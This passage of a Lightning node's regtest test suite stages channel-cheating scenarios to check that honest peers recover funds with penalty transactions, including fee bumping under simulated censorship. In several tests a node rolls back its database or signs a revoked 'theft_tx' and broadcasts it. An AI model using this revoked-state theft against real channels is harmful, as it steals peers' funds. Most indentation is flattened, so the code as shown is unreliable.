wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1csv lock one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True}]
l1, l2 = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start(wait_for_bitcoind_sync=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l2])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l1.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l1 while l1 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l1.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l1.start()
sync_blockheight(bitcoind, [l1])
l1.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l2 sees that l1 has spent their coins!
l2.daemon.wait_for_log('Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessee_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessor can recover funds if lessee cheats
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-msat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True}]
l1, l2 = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l1))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
bitcoind.generate_block(1)
# make database snapshot of l1
l1.stop()
l1_db_path = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l1_db_path_bak = os.path.join(l1.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l1_db_path, l1_db_path_bak)
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
sync_blockheight(bitcoind, [l1])
# push some money from l2->l1, so the commit counter advances
inv = l1.rpc.invoice(10**5, '2', 'no_2')
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l1's database
l1.stop()
l2.stop()
copyfile(l1_db_path_bak, l1_db_path)
# start l1 and force close channel with l2 while l2 is still offline
l1.start()
sync_blockheight(bitcoind, [l1])
l1.rpc.close(l2.info['id'], 1, force_lease_closed=True)
bitcoind.generate_block(1, wait_for_mempool=1)
l2.start()
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_PENALTY_TX',
' Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
bitcoind.generate_block(1, wait_for_mempool=1)
# l1 sees that l2 has spent their coins!
l1.daemon.wait_for_logs(['Grinding for to_remote',
'Unknown spend of OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by'])
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_fulfill(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts their htlc fulfill tx
l3 comes back online, sees l2's cheat. takes funds from htlc fulfill tx.
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4 = node_factory.line_graph(4,
opts=[{'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None},
{'plugin': coin_mvt_plugin,
'disable-mpp': None,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True},
{'dev-no-reconnect': None,
'may_reconnect': True}],
wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that l1 + l4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
l2.rpc.waitsendpay(inv['payment_hash'])
# now we send one 'sticky' htlc: l4->l1
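# 'sticky' because l1's dev_disconnect fires before it can send
# WIRE_UPDATE_FULFILL_HTLC, so the HTLC stays pending on every hop.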
amt = 10**8 // 2
sticky_inv = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv['payment_hash'], payment_secret=sticky_inv['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 1)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 and force close channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv['payment_hash']))
# l2 moves on, having force-closed on l3
bitcoind.generate_block(1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX'])
l3.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
bitcoind.generate_block(1)
l3.daemon.wait_for_log('Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.slow_test
def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
""" Test that the penalizing node claims any published
HTLC transactions
Node topology:
l1 <-> l2 <-> l3 <-> l4
^---> l5
l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
we snapshot l2
l2 pushes money to l3 (updating state)
l2 + l3 go offline; l2 is backed up from snapshot
l1 fails the channel with l2, fulfilling the stranded htlc onchain
l2 comes back online, force closes channel with l3
block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
both of which have a delay. l2 goes ahead and 'steals back' their
output + the htlc they fulfill
l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
some blocks are mined. the dust settles.
we check the accounting.
"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2, l3, l4, l5 = node_factory.get_nodes(
5,
opts=[
{
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'plugin': coin_mvt_plugin,
'dev-no-reconnect': None,
'may_reconnect': True,
'allow_broken_log': True,
}, {
'dev-no-reconnect': None,
}, {
'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
'may_reconnect': True,
'dev-no-reconnect': None,
'allow_broken_log': True,
}
]
)
node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
node_factory.join_nodes([l3, l5], wait_for_announce=True)
channel_id = first_channel_id(l2, l3)
# push some money so that l1 + l4 can both send htlcs
inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
l1.rpc.pay(inv['bolt11'])
inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
l2.rpc.pay(inv['bolt11'])
# now we send two 'sticky' htlcs, l1->l5 + l4->l1
amt = 10**8 // 2
sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
# make database snapshot of l2
l2.stop()
l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
copyfile(l2_db_path, l2_db_path_bak)
l2.start()
sync_blockheight(bitcoind, [l2])
# push some money from l3->l2, so that the commit counter advances
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
inv = l3.rpc.invoice(10**4, '1', 'push')
# Make sure gossipd in l2 knows it's active
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
l2.rpc.pay(inv['bolt11'])
# stop both nodes, roll back l2's database
l2.stop()
l3.stop()
copyfile(l2_db_path_bak, l2_db_path)
# start l2 (now rolled back a bit) and force close the channel with l3 while l3 is still offline
l2.start()
sync_blockheight(bitcoind, [l2])
l2.rpc.close(l3.info['id'], 1)
l2.daemon.wait_for_log('sendrawtx exit 0')
# reconnect with l1, which will fulfill the payment
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
l2.daemon.wait_for_log('coins payment_hash: {}'.format(sticky_inv_2['payment_hash']))
# l2 moves on, having force-closed on l3
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('to ONCHAIN')
l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# after 5 blocks, l2 reclaims both delayed outputs: the one on its unilateral and the one on its HTLC-success tx
bitcoind.generate_block(5, wait_for_mempool=0)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
bitcoind.generate_block(10, wait_for_mempool=2)
l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
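# The mock swallows l2's broadcasts: it answers with an empty success
# result, so l2 believes its transactions were relayed while bitcoind
# never actually sees them.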
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
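# Helper: wait for onchaind to log the RBF broadcast at the given depth
# and scrape the raw tx hex out of the log line, so we can rebroadcast
# it ourselves once the "censorship" ends.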
def get_rbf_tx(node, depth, name, resolve):
    r = node.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
                                 .format(name, resolve, depth))
    return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even: once for the l1 main output,
# once for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
# Use the bcli interface as well, so that path also gets exercised.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert len(l2.rpc.listfunds()['outputs']) >= 1
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding lightningd
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'],
options={'watchtime-blocks': to_self_delay})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
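# As above: swallow l2's broadcasts so bitcoind never sees them, while
# l2 believes they were relayed.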
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
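# Same helper as in test_penalty_rbf_normal: scrape the RBF tx hex for
# the given depth out of the broadcast log.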
def get_rbf_tx(node, depth, name, resolve):
    r = node.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
                                 .format(name, resolve, depth))
    return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even: once for the l1 main output,
# once for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
